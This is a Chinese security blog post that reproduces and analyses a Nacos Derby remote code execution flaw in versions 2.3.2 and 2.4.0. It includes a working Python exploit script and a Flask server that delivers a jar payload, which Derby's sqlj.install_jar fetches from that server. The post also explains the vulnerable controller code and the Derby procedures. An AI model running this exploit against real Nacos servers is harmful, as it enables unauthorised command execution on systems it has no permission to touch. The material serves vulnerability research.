Nacos Derby从SQL到RCE

最新推荐文章于 2024-09-09 07:13:43 发布
最新推荐文章于 2024-09-09 07:13:43 发布
阅读量2.6k 收藏 36
点赞数 41
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_25299117/article/details/140476392
版权

Nacos昨天爆出了一个漏洞poc:https://github.com/ayoundzw/nacos-poc。涉及两个路径

/nacos/v1/cs/ops/data/removal
nacos/v1/cs/ops/derby

其中第二个路径之前出现过漏洞:https://github.com/alibaba/nacos/issues/4463,对应编号CVE-2021-29442。漏洞成因是,Nacos当时的版本是有鉴权的,但是这个路径没有添加@Secured注解,可以未授权访问,并且可以用这个功能执行sql语句。该路径所在的ConfigOpsController类就是用于数据库管理。后来修复:https://github.com/alibaba/nacos/pull/4517对这个路径增加了注解,要求admin用户权限。也就是需要登录后台才能访问了。

    @GetMapping(value = "/derby")
    @Secured(action = ActionTypes.READ, resource = "nacos/admin")
    public RestResult<Object> derbyOps(@RequestParam(value = "sql") String sql) {...}

但是有意思的是,由于后来版本的鉴权在配置文件中包含默认的用户名、密码、key,导致了权限和认证绕过漏洞。参考:https://github.com/ax1sX/SecurityList/blob/main/Java_OA/NacosAudit.md。官方就干脆默认安装的时候不开启鉴权,让用户自己去配置,杜绝默认的用户名密码问题。但这也就意味着新版本中,默认是不开鉴权的,如果用户没有去配置鉴权,那上面CVE-2021-29442的路径还能利用。但是这个路径只支持select查询,无法实现RCE。

这个漏洞就配合了第一个路径,先将jar文件存储到数据库中,实现自定义函数,然后利用自定义函数实现RCE。写这篇文章就是因为第一步中对于derby攻击的利用方式是有通用的借鉴意义的。

漏洞复现

从github上https://github.com/alibaba/nacos/releases下载2.3.2或2.4.0版本,然后在bin目录下执行sh startup.sh -m standalone

PS:如果想要开启调试,需按下图更改startup.sh文件后再执行sh startup.sh -m standalone
加入调试

先启动service.py,脚本启动了一个web服务器,并且设置了一个路由/download

import base64
from flask import Flask, send_file,Response
import config

payload = b'base64'

app = Flask(__name__)

@app.route('/download')
def download_file():
    data = base64.b64decode(payload)
    print(data)
    response = Response(data, mimetype="application/octet-stream")
    return response

if __name__ == '__main__':
    app.run(host=config.server_host, port=config.server_port)

头部的import config,就是引入config.py的配置,定义了在什么ip和端口下起这个服务器。

server_host = '127.0.0.1'
server_port = 5000

payload实际就是一个jar文件的base64编码。可以用如下代码将其还原成jar包

import java.io.FileOutputStream;
import java.io.IOException;
import java.util.Base64;

public class Base64ToJar {
    public static void main(String[] args) {
        String base64String = "base64_string";
        byte[] jarBytes = Base64.getDecoder().decode(base64String);
        String jarFilePath = "output.jar";

        try (FileOutputStream fos = new FileOutputStream(jarFilePath)) {
            fos.write(jarBytes);
            System.out.println("JAR文件已成功生成: " + jarFilePath);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

对应的jar包如下

jar包内容

然后执行攻击脚本

import random
import sys
import requests
from urllib.parse import urljoin
import config


# 按装订区域中的绿色按钮以运行脚本。
def exploit(target, command, service):
    removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal')
    derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
    for i in range(0,sys.maxsize):
        id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8))
        post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n
        CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n
        CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service);
        option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')\n".format(id=id,cmd=command);
        get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id,cmd=command);
        files = {'file': post_sql}
        post_resp = requests.post(url=removal_url,files=files)
        post_json = post_resp.json()
        if post_json.get('message',None) is None and post_json.get('data',None) is not None:
            print(post_resp.text)
            get_resp = requests.get(url=derby_url,params={'sql':get_sql})
            print(get_resp.text)
            break


if __name__ == '__main__':
    service = 'http://{host}:{port}/download'.format(host=config.server_host,port=config.server_port)
    target = 'http://127.0.0.1:8848'
    command = 'open -a Calculator'
    target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target
    command = input('请输入命令,默认:open -a Calculator:') or command
    exploit(target=target, command=command,service=service)

脚本执行结果如下。

漏洞复现

漏洞分析

先看看exploit中的第一步对/nacos/v1/cs/ops/data/removal路径发起POST请求。根据路由定位到ConfigOpsController。注释的意思是这类方法是将外部数据源被导入到derby中。
ConfigOpsController

代码首先判断了是否为embedded storage mode,想要不执行if中的代码就要求单机模式启动,单机模式启动时为standalone Mode,也就对应了漏洞复现时要求环境启动语句添加参数sh startup.sh -m standalone

然后执行文件上传,这里文件上传成功后会执行回调函数。也就是file -> {...中的内容。回调函数中调用 databaseOperate.dataImport(file) 方法,将文件数据导入数据库。

dataImport

dataImport()方法异步执行任务,逐行读取文件中的内容,将非空的内容放入batchUpdate这个列表变量中暂存。然后异步执行批量导入操作doDataImport(),将结果存储到results列表中。等所有异步任务完成,如果所有任务都成功,即results中没有false,那么返回状态码200,否则返回500。

逻辑很简单,上传sql语句,然后批量执行sql。poc中一共上传了三句sql。这就需要了解一下derby的语法,了解这三句sql分别有什么作用。

derby RCE

Apache Derby是一个开源的关系数据库管理系统 (RDBMS),它使用 Java 编写。Derby的特点就是轻量级,占用的内存小,适合嵌入式应用,所有的功能都可以嵌入到java应用中运行。加入要开发嵌入式设备,在设备上存储数据和用户信息,就可以选用Derby嵌入式数据库,通过API在设备上管理数据而不需要复杂的数据库管理和配置。

查看derby的官方文档

1. CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n
2. CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n
3. CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service);
  1. https://db.apache.org/derby/docs/10.9/ref/rrefstorejarinstall.html
    SQLJ.INSTALL_JAR是一个存储过程函数,将jar文件存储在数据库中。此功能一般用于扩展数据库或自定义功能。可以让jar文件中的类和方法在数据库执行sql和存储过程中使用。

SQLJ.INSTALL_JAR用法示例

第一个参数是要安装的jar文件的位置。第二个参数是安装后在数据库中使用的名称,一般为架构名称.ID。第三个参数是标志位,表示如果已经存在同名文件是否覆盖。0表示不覆盖。

  1. https://db.apache.org/derby/docs/10.1/ref/rrefsetdbpropproc.html
    SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY系统过程用于设置或删除当前连接上数据库的属性值。用法就是key:value。在这里就是将derby.database.classpath属性改为了jar安装后的名称NACOS.{id}

  2. https://db.apache.org/derby/docs/10.4/ref/rrefcreatefunctionstatement.html
    CREATE FUNCTION语句允许创建 Java 函数,然后可以在表达式中使用这些函数。但是函数中要求必须包含以下三个元素。
    CREATE FUNCTION函数要求
    LANGUAGE一般为JAVAEXTERNAL NAME代表函数执行时要调用的Java方法,格式为类名.方法名PARAMETER STYLE一般来说都是JAVA

CREATE FUNCTION示例

POC样式如下,EXTERNAL NAME就是jar包中类的全限定类名。

CREATE FUNCTION S_EXAMPLE_{id}
( PARAM VARCHAR(2000)) 
RETURNS VARCHAR(2000) 
PARAMETER STYLE JAVA 
NO SQL LANGUAGE JAVA 
EXTERNAL NAME 'test.poc.Example.exec'

那么总结上述三步,就是将读入的jar包安装到数据库中,并且将数据库连接属性值改为该jar包名称。然后创建自定义函数。

由于这步可以导入任何sql语句,那么理论上还可以在创建Funtion或Procedure后,直接执行Call Procedure。但是实际在Nacos下测试时这步会返回500。

触发自定义函数

/derby路径下的函数如下,该方法主要用于Derby数据库的查询操作,确保只执行SELECT语句,并在必要时添加分页限制。如果当前存储模式不是 Derby 或者遇到异常,方法会返回相应的错误信息。

/derby

在Java应用程序中使用JDBC API调用Derby的存储过程和函数会触发相应的函数执行。

附录

教一下如何把class打成jar包。

打jar包

白帽AxisX
关注
Nacos Derby 远程命令执行漏洞(QVD-2024-26473)
0xSec
07-19 6131
由于Alibaba Nacos部分版本中derby数据库默认可以未授权访问,恶意攻击者利用此漏洞可以未授权执行SQL语句,最终导致任意代码执行。目前该漏洞PoC已在互联网上公开,鉴于该漏洞影响范围较大,建议尽快做好自查及防护。此漏洞允许未经身份验证的远程攻击者执行任意代码,可能导致数据泄露、服务中断或系统被完全控制。
【漏洞复现】Nacos Derby SQL注入漏洞
晚风不及你
04-28 3026
Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。
Nacos未授权和身份认证漏洞修复
zyfmeng的博客
12-27 3039
nacos未授权及弱身份认证漏洞修复
Nacos历史漏洞复现(汇总)
qq_55202378的博客
08-18 3218
这个漏洞其实可以说是CVE-2021-29442的更深层次利用,在上文中我们分析了,Derby未授权SQL注入利用的是/derby这个路由,但是限制了语句必须为select开头的即查询语句,而仅仅是查询语句就无法RCE。:nacos带有一个嵌入式的小型数据库derby,而在版本<=1.4.0的默认配置部署nacos的情况下,它无需认证即可被访问,并执行任意sql查询,导致敏感信息泄露。简单来说就是将远程服务器上的jar包导入数据库,就可以动态调用类中的static方法),也就是所谓组合拳RCE
工具分享 | NacosExploit - 一款Nacos综合利用工具,一键getshell。
最新发布
IT软件汇
09-09 473
工具分享 | NacosExploit - 一款Nacos综合利用工具,一键getshell。
nacos /derby接口
2401_85480529的博客
07-18 875
修复链接:https://github.com/alibaba/nacos/pull/4517/files。的方法,该方法用于处理对 Derby 数据库SQL 查询操作。如果传递的 SQL 语句不是查询语句,则返回一个失败的。,这是客户端传递过来的 SQL 查询语句。添加到 SQL 语句的末尾,以限制返回的记录条数。如果当前存储模式不是 Derby,则返回一个失败的。如果在执行过程中发生异常,捕获异常并返回一个失败的。表示默认的分页查询语句,限制返回的记录条数。然后,返回一个包含查询结果的成功。
Nacos 202407月RCE漏洞(0day)与复现
分享不一样的技术,与你一起共同成长!
07-31 2152
202407月, 爆出漏洞作者说由于某些原因,特意爆出了Nacos的一个RCE 0day漏洞。Nacos 是一个用于动态服务发现和配置以及服务管理的平台,Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查,在使用 standalone 模式启动 Nacos 时,为了避免因搭建外置数据库而占用额外的资源...
nacos内嵌数据库derby查看
mySherlock的博客
08-10 1039
nacos内嵌derby数据库的连接
nacos适配postgresqlsql脚本
07-16
适配教程一堆github地址加载真的让人很崩溃,想要拿来主义,但是大家都太好了,都给的鱼竿不给鱼。 我来给最后一道坎递纸吧。 nacos适配 pg的sql脚本
nacos2.0.2版本依赖数据库sql脚本
07-17
nacos2.0.2版本依赖数据库sql脚本
支持多种数据源的nacos-1.4.2,包括mysql/postgresql/oracle/derby
02-24
支持多种数据源的nacos,包括mysql/postgresql/oracle/derby 版本号为1.4.2 对应的各个组件版本 springcloud version: 2020.0.1 springboot version: 2.4.2 springcloudalibaba version: 2021.1 需根据自身情况修改 conf/application.properties 中的数据库配置
nacos脚本.sql
07-01
nacos配置mysql永久缓存的数据库脚本
nacos漏洞小结
qq_61475980的博客
07-01 3676
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。在路径后面加上可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图更改提交方式为POST, 访问新建一个账号test111,可以看到创建用户成功,如图更改提交方式为DELETE, 访问可以看到用户删除成功,如图更改提交方式为。
Nacos
tianzhenhahaha的博客
10-11 947
springcloud-nacos小计
Nacos单机部署、集群部署以及Nacos默认持久化derby数据库和配置mysql数据库
Benjamin
07-02 3055
2.2 通过derby脚本bin目录下面的使用输入ij使用ij工具(或单击ij.bat后启动ij工具),连接数据库,通过ij.bat工具连接derby数据库,双击ij.bat文件,连接命令如下:dedb是数据库名。找到nacos下面的derby-data,用户名/密码 nacos/ nacos。连接数据后,执行derby数据库脚本,sql脚本在nacos/config/derby-schema.sql。单机启动会在nacos/data/derby-data包,存储的是数据库信息。
Nacosderby模式下密码忘记】使用derby的ij工具重置密码/修改密码
小慌慌的博客
05-10 3996
nacos部署未用,直接运行,使用了默认的derby数据库,这时候不一小心修改的密码给忘记了,无法登录当时是部署在centos上的一个演示环境,没有采用mysql数据库,如果生产上,建议使用mysql
docker-compose部署nacos derby(官网文档)
学亮编程手记
08-17 789
https://github.com/nacos-group/nacos-docker/blob/master/example/ version: "2" services: nacos: image: nacos/nacos-server:${NACOS_VERSION} container_name: nacos-standalone environment: - PREFER_HOST_MODE=hostname - MODE=standalone
docker安装nacos,单例模式(standalone),使用内置的derby数据库,简易安装
weixin_43651674的博客
04-03 1125
nacos作为主流的服务发现中心和配置中心,广泛应用于springcloud框架中,现在就让我们一起简易的部署一个单例模式的nacos,版本可能较低,v2.0.4,但胜在稳定且脱离mysql
nacos2.0.2依赖sql
07-12
Nacos 2.0.2 是一个开源的服务发现和配置管理平台,它可以用于动态配置管理、服务注册和发现等功能。Nacos 2.0.2 并不直接依赖于 SQL 数据库,它默认使用嵌入式的键值存储(Embedded KV)来存储配置和服务注册信息。 然而,Nacos 也提供了对外部数据库的支持,包括 MySQL、Oracle、PostgreSQL 等。通过配置相应的数据源和连接信息,您可以将 Nacos 配置为使用 SQL 数据库进行存储。 具体来说,您可以通过修改 Nacos 的配置文件(nacos/conf/application.properties 或 nacos/conf/application.yaml)来配置数据库相关信息。以下是一个示例: ``` spring.datasource.platform=mysql db.num=1 db.url.0=jdbc:mysql://localhost:3306/nacos?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true db.user=username db.password=password ``` 在上述示例中,我们将数据库平台设置为 MySQL,配置了一个名为 "nacos" 的数据库,并提供了相应的连接信息。 请注意,使用 SQL 数据库存储会对性能产生一定的影响,因此在选择是否使用 SQL 数据库时需要权衡考虑您的业务需求和性能要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值